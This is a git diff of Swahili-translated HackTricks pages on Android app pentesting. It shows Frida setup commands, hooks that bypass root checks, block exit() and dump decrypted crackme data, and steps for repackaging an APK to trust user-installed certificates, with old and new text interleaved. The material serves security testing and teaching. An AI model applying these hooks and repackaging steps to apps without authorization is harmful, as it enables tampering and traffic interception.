* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
<figure><img src="../../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
**Mshauri wa tuzo za mdudu**: **Jisajili** kwa **Intigriti**, jukwaa la tuzo za mdudu la malipo la juu lililoanzishwa na wadukuzi, kwa wadukuzi! Jiunge nasi kwenye [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) leo, na anza kupata tuzo hadi **$100,000**!
**Nasaha ya bug bounty**: **jiandikishe** kwa **Intigriti**, jukwaa la **bug bounty la premium lililotengenezwa na hackers, kwa hackers**! Jiunge nasi kwenye [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) leo, na uanze kupata zawadi hadi **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
## Usanidi
## Installation
Sanidi **zana za frida**:
Sakinisha **frida tools**:
```bash
pip install frida-tools
pip install frida
```
**Pakua na usakinishe** kwenye kifaa cha android **seva ya frida** ([Pakua toleo jipya](https://github.com/frida/frida/releases)).\
Mstari mmoja wa kuwasha upya adb kwa mode ya root, kuunganisha kwenye kifaa, kupakia frida-server, kutoa ruhusa za utekelezaji na kuendesha kwa nyuma:
**Pakua na sakinisha** katika android **frida server** ([Pakua toleo jipya zaidi](https://github.com/frida/frida/releases)).\
Mstari mmoja wa kuanzisha adb tena katika hali ya mizizi, kuungana nayo, kupakia frida-server, kutoa ruhusa za kutekeleza na kuikimbia katika hali ya nyuma:
{% code overflow="wrap" %}
```bash
@ -36,40 +37,40 @@ adb root; adb connect localhost:6000; sleep 1; adb push frida-server /data/local
```
{% endcode %}
**Angalia** kama **inavyofanya kazi**:
**Angalia** ikiwa inafanya **kazi**:
```bash
frida-ps -U #List packages and processes
frida-ps -U | grep -i <part_of_the_package_name> #Get all the package name
```
## Mafunzo
## Tutorials
### [Mafunzo ya 1](frida-tutorial-1.md)
### [Tutorial 1](frida-tutorial-1.md)
**Kutoka**: [https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1](https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1)\
**From**: [https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1](https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1)\
**APK**: [https://github.com/t0thkr1s/frida-demo/releases](https://github.com/t0thkr1s/frida-demo/releases)\
**Msimbo wa Chanzo**: [https://github.com/t0thkr1s/frida-demo](https://github.com/t0thkr1s/frida-demo)
**Source Code**: [https://github.com/t0thkr1s/frida-demo](https://github.com/t0thkr1s/frida-demo)
**Fuata [kiungo hiki kusoma](frida-tutorial-1.md).**
**Follow the [link to read it](frida-tutorial-1.md).**
### [Mafunzo ya 2](frida-tutorial-2.md)
### [Tutorial 2](frida-tutorial-2.md)
**Kutoka**: [https://11x256.github.io/Frida-hooking-android-part-2/](https://11x256.github.io/Frida-hooking-android-part-2/) (Sehemu 2, 3 & 4)\
**APKs na Msimbo wa Chanzo**: [https://github.com/11x256/frida-android-examples](https://github.com/11x256/frida-android-examples)
**From**: [https://11x256.github.io/Frida-hooking-android-part-2/](https://11x256.github.io/Frida-hooking-android-part-2/) (Sehemu 2, 3 & 4)\
**APKs and Source code**: [https://github.com/11x256/frida-android-examples](https://github.com/11x256/frida-android-examples)
**Fuata [kiungo hiki kusoma](frida-tutorial-2.md).**
**Follow the[ link to read it.](frida-tutorial-2.md)**
### [Mafunzo ya 3](owaspuncrackable-1.md)
### [Tutorial 3](owaspuncrackable-1.md)
**Kutoka**: [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)\
**From**: [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)\
**APK**: [https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk](https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk)
**Fuata [kiungo hiki kusoma](owaspuncrackable-1.md).**
**Follow the [link to read it](owaspuncrackable-1.md).**
**Unaweza kupata skripti zaidi za Frida hapa:** [**https://codeshare.frida.re/**](https://codeshare.frida.re)
**You can find more Awesome Frida scripts here:** [**https://codeshare.frida.re/**](https://codeshare.frida.re)
## Mifano ya Haraka
## Quick Examples
### Kuita Frida kutoka kwenye mstari wa amri
### Calling Frida from command line
```bash
frida-ps -U
@ -82,57 +83,7 @@ frida -U --no-pause -l disableRoot.js -f owasp.mstg.uncrackable1
#frozen so that the instrumentation can occur, and the automatically
#continue execution with our modified code.
```
### Skripti ya Msingi ya Python
```python
import frida
# Create a session to connect to the target Android device
device = frida.get_usb_device()
pid = device.spawn(["com.example.app"])
session = device.attach(pid)
# Load the JavaScript code into the session
with open("script.js", "r") as file:
script_code = file.read()
script = session.create_script(script_code)
# Load the script into the target app's process
script.load()
# Run the script
script.exports.run()
# Detach from the target app's process and clean up
session.detach()
device.kill(pid)
```
### Skripti Rahisi ya Python
```python
import frida
# Unda kikao cha kuunganisha kifaa cha Android kilicholengwa
device = frida.get_usb_device()
pid = device.spawn(["com.example.app"])
session = device.attach(pid)
# Pakia kificho cha JavaScript kwenye kikao
with open("script.js", "r") as file:
script_code = file.read()
script = session.create_script(script_code)
# Pakia kificho kwenye mchakato wa programu ya lengo
script.load()
# Chalisha kificho
script.exports.run()
# Tenganisha kutoka kwenye mchakato wa programu ya lengo na safisha
session.detach()
device.kill(pid)
```
### Msingi wa Skripti ya Python
```python
import frida, sys
@ -143,9 +94,9 @@ print('[ * ] Running Frida Demo application')
script.load()
sys.stdin.read()
```
### Kufunga kazi bila vigezo
### Hooking functions without parameters
Funga kazi `a()` ya darasa `sg.vantagepoint.a.c`
Hook the function `a()` of the class `sg.vantagepoint.a.c`
```javascript
Java.perform(function () {
; rootcheck1.a.overload().implementation = function() {
@ -155,101 +106,14 @@ return false;
};
});
```
# Kufunga java `exit()`
Katika programu za Android, `exit()` ni njia ya kumaliza programu. Kwa kufunga njia hii, tunaweza kuzuia programu isifunge kwa njia ya kawaida.
Frida inaruhusu kufunga njia hii kwa kuingilia kati kwenye kificho cha Java na kubadilisha matokeo ya wito wa `exit()`.
## Hatua za kufunga `exit()`
1. Anza kwa kuanzisha mazingira ya Frida kwenye kifaa chako cha Android.
2. Tumia kifaa chako cha Android kuanzisha mawasiliano na programu unayotaka kufunga `exit()`.
3. Tumia Frida kuchunguza kificho cha Java kinachohusiana na `exit()`.
4. Tumia Frida kubadilisha matokeo ya wito wa `exit()` ili kuzuia programu isifunge.
## Mifano ya Kubadilisha `exit()`
### Kubadilisha Matokeo ya `exit()` kuwa 0
```javascript
Java.perform(function() {
var System = Java.use('java.lang.System');
System.exit.implementation = function() {
console.log('exit() hooked');
return 0;
};
});
```
### Kubadilisha Matokeo ya `exit()` kuwa 1
```javascript
Java.perform(function() {
var System = Java.use('java.lang.System');
System.exit.implementation = function() {
console.log('exit() hooked');
return 1;
};
});
```
Kwa kufuata hatua hizi, unaweza kufunga `exit()` kwenye programu yako ya Android na kubadilisha matokeo ya wito wa `exit()` kulingana na mahitaji yako.
Hook java `exit()`
```javascript
var sysexit = Java.use("java.lang.System");
sysexit.exit.overload("int").implementation = function(var_0) {
send("java.lang.System.exit(I)V // We avoid exiting the application :)");
};
```
# Frida Tutorial: Kufunga `.onStart()` & `.onCreate()` ya MainActivity
Katika mafunzo haya, tutajifunza jinsi ya kufunga `.onStart()` na `.onCreate()` ya MainActivity katika programu ya Android kwa kutumia Frida.
## Hatua ya 1: Kuandaa Mazingira
Kabla ya kuanza, hakikisha kuwa umeweka mazingira yako ya maendeleo ya Android na Frida. Unaweza kufuata hatua zilizoelezwa katika [mafunzo haya](https://github.com/hacktricks/HackTricks-1/blob/master/mobilePentesting/androidAppPentesting/frida-tutorial/README.md) ili kuweka mazingira yako.
## Hatua ya 2: Kuandika Script ya Frida
Tutahitaji kuandika script ya Frida ili kufunga `.onStart()` na `.onCreate()` ya MainActivity. Hapa kuna script ya mfano:
```javascript
Java.perform(function() {
var MainActivity = Java.use('com.example.app.MainActivity');
MainActivity.onStart.implementation = function() {
console.log('onStart() imefungwa!');
this.onStart();
};
MainActivity.onCreate.implementation = function() {
console.log('onCreate() imefungwa!');
this.onCreate();
};
});
```
## Hatua ya 3: Kutekeleza Script ya Frida
Sasa tunahitaji kutekeleza script ya Frida kwenye programu ya Android. Hapa kuna hatua za kufuata:
1. Anza programu yako ya Android kwenye kifaa chako cha majaribio.
2. Fungua terminal na nenda kwenye saraka ambapo script ya Frida imehifadhiwa.
3. Chapa amri ifuatayo kutekeleza script ya Frida:
```bash
frida -U -f com.example.app -l script.js --no-pause
```
Kumbuka kubadilisha `com.example.app` na jina la pakiti la programu yako ya Android.
## Hatua ya 4: Kupima Matokeo
Baada ya kutekeleza script ya Frida, unapaswa kuona ujumbe "onStart() imefungwa!" na "onCreate() imefungwa!" kwenye terminal. Hii inathibitisha kuwa `.onStart()` na `.onCreate()` ya MainActivity zimefungwa.
## Hitimisho
Kwa kufuata hatua hizi, unaweza kufunga `.onStart()` na `.onCreate()` ya MainActivity katika programu yako ya Android kwa kutumia Frida. Hii inaweza kuwa na manufaa katika uchunguzi wa usalama na upimaji wa programu.
Hook MainActivity `.onStart()` & `.onCreate()`
```javascript
var mainactivity = Java.use("sg.vantagepoint.uncrackable1.MainActivity");
mainactivity.onStart.overload().implementation = function() {
@ -261,34 +125,7 @@ send("MainActivity.onCreate() HIT!!!");
var ret = this.onCreate.overload("android.os.Bundle").call(this,var_0);
};
```
# Kufunga `.onCreate()` ya Android
Katika maendeleo ya programu za Android, `.onCreate()` ni njia muhimu sana ambayo huitwa wakati shughuli (activity) ya Android inaundwa. Kwa kufunga `.onCreate()`, tunaweza kuingilia kati mchakato wa kuanzisha shughuli na kufanya mabadiliko fulani.
Frida ni kifaa cha kuvamia ambacho kinaweza kutumika kufunga `.onCreate()` ya Android. Hapa kuna hatua za kufuata:
1. Tumia Frida kuanzisha mchakato wa programu ya Android unayotaka kufunga `.onCreate()` yake.
2. Tumia Frida kusoma na kuchambua kificho cha programu ili kupata jina la darasa na jina la njia ya `.onCreate()`.
3. Tumia Frida kuunda skripti ya JavaScript ambayo itaingilia kati `.onCreate()` na kufanya mabadiliko unayotaka.
4. Tumia Frida kutekeleza skripti ya JavaScript kwenye mchakato wa programu ya Android.
Hapa kuna mfano wa skripti ya JavaScript ambayo inafunga `.onCreate()` ya shughuli ya Android:
```javascript
Java.perform(function() {
var Activity = Java.use('com.example.Activity'); // Badilisha 'com.example.Activity' na jina la darasa la shughuli yako ya Android
Activity.onCreate.implementation = function(savedInstanceState) {
// Mabadiliko unayotaka kufanya
// ...
// Kuita .onCreate() ya awali
this.onCreate(savedInstanceState);
};
});
```
Kwa kutekeleza skripti hii ya JavaScript na Frida, utaweza kufunga `.onCreate()` ya shughuli ya Android na kufanya mabadiliko unayotaka.
Hook android `.onCreate()`
```javascript
var activity = Java.use("android.app.Activity");
activity.onCreate.overload("android.os.Bundle").implementation = function(var_0) {
@ -296,9 +133,9 @@ send("Activity HIT!!!");
var ret = this.onCreate.overload("android.os.Bundle").call(this,var_0);
};
```
### Kufunga kazi na vigezo na kupata thamani
### Hooking functions with parameters and retrieving the value
Kufunga kazi ya kufichua. Chapisha kuingia, ita kazi halisi ya kufichua kuingia na hatimaye, chapisha data wazi:
Kuhooki kazi ya ufichuzi. Chapisha ingizo, itisha kazi ya asili kufichua ingizo na hatimaye, chapisha data safi:
```javascript
function getString(data){
var ret = "";
@ -323,9 +160,9 @@ send("Decrypted flag: " + flag);
return ret; //[B
};
```
### Kufunga kazi na kuzipiga kwa kutumia kuingiza kwetu
### Hooking functions and calling them with our input
Funga kazi ambayo inapokea herufi na ipige kazi hiyo kwa kutumia herufi nyingine (kutoka [hapa](https://11x256.github.io/Frida-hooking-android-part-2/))
Hooka kazi inayopokea mfuatano wa herufi na uitumie na mfuatano mwingine wa herufi (kutoka [hapa](https://11x256.github.io/Frida-hooking-android-part-2/))
```javascript
var string_class = Java.use("java.lang.String"); // get a JS wrapper for java's String class
@ -339,7 +176,7 @@ return ret;
```
### Kupata kitu kilichoundwa tayari cha darasa
Ikiwa unataka kuchukua sifa fulani ya kitu kilichoundwa, unaweza kutumia hii.
Ikiwa unataka kutoa sifa fulani ya kitu kilichoundwa unaweza kutumia hii.
Katika mfano huu utaona jinsi ya kupata kitu cha darasa my\_activity na jinsi ya kuita kazi .secret() ambayo itachapisha sifa ya faragha ya kitu:
```javascript
@ -351,29 +188,30 @@ console.log("Result of secret func: " + instance.secret());
onComplete:function(){}
});
```
## Mafunzo mengine ya Frida
## Other Frida tutorials
* [https://github.com/DERE-ad2001/Frida-Labs](https://github.com/DERE-ad2001/Frida-Labs)
* [Sehemu ya 1 ya mfululizo wa blogu kuhusu Matumizi ya Frida ya Juu: Maktaba za Kusimbua za IOS](https://8ksec.io/advanced-frida-usage-part-1-ios-encryption-libraries-8ksec-blogs/)
* [Part 1 of Advanced Frida Usage blog series: IOS Encryption Libraries](https://8ksec.io/advanced-frida-usage-part-1-ios-encryption-libraries-8ksec-blogs/)
<figure><img src="../../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
**Mshauri wa tuzo ya mdudu**: **Jisajili** kwa **Intigriti**, jukwaa la tuzo za mdudu la malipo lililoanzishwa na wadukuzi, kwa wadukuzi! Jiunge nasi kwenye [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) leo, na anza kupata tuzo hadi **$100,000**!
**Bug bounty tip**: **jiandikishe** kwa **Intigriti**, jukwaa la **bug bounty la kiwango cha juu lililotengenezwa na hackers, kwa hackers**! Jiunge nasi kwenye [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) leo, na anza kupata zawadi hadi **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

52
mobile-pentesting/android-app-pentesting/intent-injection.md
View file

@ -1,31 +1,33 @@
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
**Tazama: [https://blog.oversecured.com/Android-Access-to-app-protected-components/](https://blog.oversecured.com/Android-Access-to-app-protected-components/)**
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
**Angalia: [https://blog.oversecured.com/Android-Access-to-app-protected-components/](https://blog.oversecured.com/Android-Access-to-app-protected-components/)**
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

51
mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md
View file

@ -1,18 +1,19 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
**Kikundi cha Usalama cha Kujitahidi Kufanikiwa**
**Try Hard Security Group**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
@ -20,19 +21,19 @@ Njia nyingine za kusaidia HackTricks:
***
Baadhi ya programu hazipendi vyeti vilivyopakuliwa na mtumiaji, hivyo ili kuchunguza trafiki ya wavuti kwa baadhi ya programu tunapaswa kuchambua tena programu na kuongeza vitu kadhaa na kuirudisha.
Baadhi ya programu hazipendi vyeti vilivyopakuliwa na mtumiaji, hivyo ili kukagua trafiki ya wavuti kwa baadhi ya programu tunapaswa ku-decompile programu hiyo na kuongeza mambo machache na kuirekebisha tena.
# Kiotomatiki
# Automatic
Zana [**https://github.com/shroudedcode/apk-mitm**](https://github.com/shroudedcode/apk-mitm) itafanya **kiotomatiki** mabadiliko muhimu kwenye programu ili kuanza kukamata maombi na pia kulemaza certificate pinning (ikiwa ipo).
Zana [**https://github.com/shroudedcode/apk-mitm**](https://github.com/shroudedcode/apk-mitm) itafanya mabadiliko muhimu kwenye programu ili kuanza kukamata maombi na pia itazima certificate pinning (ikiwa ipo).
# Kwa Mkono
# Manual
Kwanza tunachambua programu: `apktool d *jina-la-faili*.apk`
Kwanza tunadecompile programu: `apktool d *file-name*.apk`
![](../../.gitbook/assets/img9.png)
Kisha tunakwenda kwenye faili ya **Manifest.xml** & tunasonga chini hadi lebo ya `<\application android>` na tutaweka mstari ufuatao ikiwa haupo tayari:
Kisha tunaenda kwenye faili la **Manifest.xml** na kuporomoka hadi kwenye tag ya `<\application android>` na tutaongeza mstari ufuatao ikiwa haupo tayari:
`android:networkSecurityConfig="@xml/network_security_config`
@ -44,7 +45,7 @@ Baada ya kuongeza:
![](../../.gitbook/assets/img11.png)
Sasa nenda kwenye saraka ya **res/xml** & unda/boresha faili iitwayo network\_security\_config.xml na yaliyomo yafuatayo:
Sasa ingia kwenye folda ya **res/xml** na uunde/badilisha faili lililo na jina network\_security\_config.xml lenye maudhui yafuatayo:
```markup
<network-security-config>
<base-config>
@ -57,28 +58,28 @@ Sasa nenda kwenye saraka ya **res/xml** & unda/boresha faili iitwayo network\_se
</base-config>
</network-security-config>
```
Kisha hifadhi faili & rudi nyuma kutoka kwenye mafaili yote na jenga upya apk kwa kutumia amri ifuatayo: `apktool b *jina-la-folda/* -o *faili-la-matokeo.apk*`
Kisha, hifadhi faili na kutoka kwenye saraka zote na ujenge tena apk kwa amri ifuatayo: `apktool b *folder-name/* -o *output-file.apk*`
![](../../.gitbook/assets/img12.png)
Mwishowe, unahitaji tu **kusaini programu mpya**. [Soma sehemu hii ya ukurasa wa Smali - Kudecompile/\[Kubadilisha\]/Kukusanya ili kujifunza jinsi ya kuaisaini](smali-changes.md#sing-the-new-apk).
Hatimaye, unahitaji tu **kusaini programu mpya**. [Soma sehemu hii ya ukurasa Smali - Decompiling/\[Modifying\]/Compiling kujifunza jinsi ya kuisaini](smali-changes.md#sing-the-new-apk).
<details>
**Kikundi cha Usalama cha Try Hard**
**Try Hard Security Group**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %}
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Ikiwa unataka kuona **kampuni yako ikitangazwa katika HackTricks** au **download HackTricks katika PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**PEASS rasmi & HackTricks swag**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

79
mobile-pentesting/android-app-pentesting/manual-deobfuscation.md
View file

@ -1,63 +1,66 @@
{% hint style="success" %}
